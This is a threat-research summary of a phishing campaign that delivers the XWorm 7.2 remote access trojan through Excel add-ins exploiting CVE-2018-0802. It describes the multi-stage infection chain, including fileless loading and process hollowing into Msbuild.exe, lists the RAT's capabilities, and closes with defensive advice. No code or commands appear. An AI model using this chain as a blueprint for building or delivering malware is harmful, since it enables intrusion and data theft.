FortiGuard Labs has uncovered a sophisticated phishing campaign delivering XWorm version 7.2, a multi-functional Remote Access Trojan (RAT) that provides attackers with full remote control of compromised Windows systems.
Campaign Overview
The campaign utilizes multiple phishing email themes written in various languages to maximize its reach. Emails are disguised as:
- Payment detail requests requiring recipient review
- Purchase orders requesting acknowledgment
- Signed bank documents related to shipments
- Other business-related communications
All phishing emails include an attached Excel add-in file (.XLAM) instructing recipients to open the attachment for additional details.
Exploitation of CVE-2018-0802
The malicious Excel files contain an embedded OLE (Object Linking and Embedding) object configured to auto-load. This object exploits CVE-2018-0802, a remote code execution vulnerability in Microsoft Equation Editor (EQNEDT32.EXE) that remains actively exploited despite being discovered years ago.
When the Excel file is opened, EQNEDT32.EXE parses the malformed OLE object, triggering the vulnerability and executing embedded shellcode.
Sophisticated Infection Chain
The attack follows a multi-stage infection process:
- Initial Access: Shellcode downloads an HTA file from the attacker’s infrastructure
- HTA Execution: The HTA file triggers obfuscated JScript code that launches PowerShell
- Fileless Module: PowerShell downloads a JPEG file containing a hidden .NET module between “BaseStart” and “BaseEnd” markers
- Memory-Only Loading: The .NET module is extracted and loaded directly into memory without writing to disk
- Process Hollowing: The module creates a suspended Msbuild.exe process and injects the XWorm payload using process hollowing techniques
The use of Msbuild.exe as the injection target is deliberate—as a .NET-compiled executable, it initializes the required runtime environment for the .NET-based XWorm RAT to execute.
XWorm 7.2 Capabilities
XWorm, first identified in 2022, remains actively distributed through underground marketplaces including Telegram. Version 7.2 was released in late 2025/early 2026 and includes extensive control capabilities:
- Remote Control: Full system access, command execution, file transfer
- DDoS Attacks: Built-in capability to launch DDoS attacks against specified targets
- Keylogging: Offline keystroke capture stored locally
- Screenshot Capture: Remote screenshot capability
- System Control: Shutdown, restart, and logoff commands
- Host File Manipulation: Read and modify the hosts file to block or redirect websites
- Plugin Architecture: Supports 50+ plugins for extended functionality
Encrypted C2 Communications
XWorm protects its command-and-control communications using AES encryption. Upon connection, it sends a registration packet containing detailed victim information including system specs, username, antivirus products, and hardware information—all delimited by the string “<Xwormmm>”.
Defensive Recommendations
- Ensure systems are patched against CVE-2018-0802 and other Equation Editor vulnerabilities
- Block macro-enabled Office documents from untrusted sources
- Monitor for suspicious PowerShell activity and process hollowing behaviors
- Implement email filtering to detect phishing attempts with malicious attachments
- Deploy EDR solutions capable of detecting fileless malware techniques
Source: FortiGuard Labs Threat Research
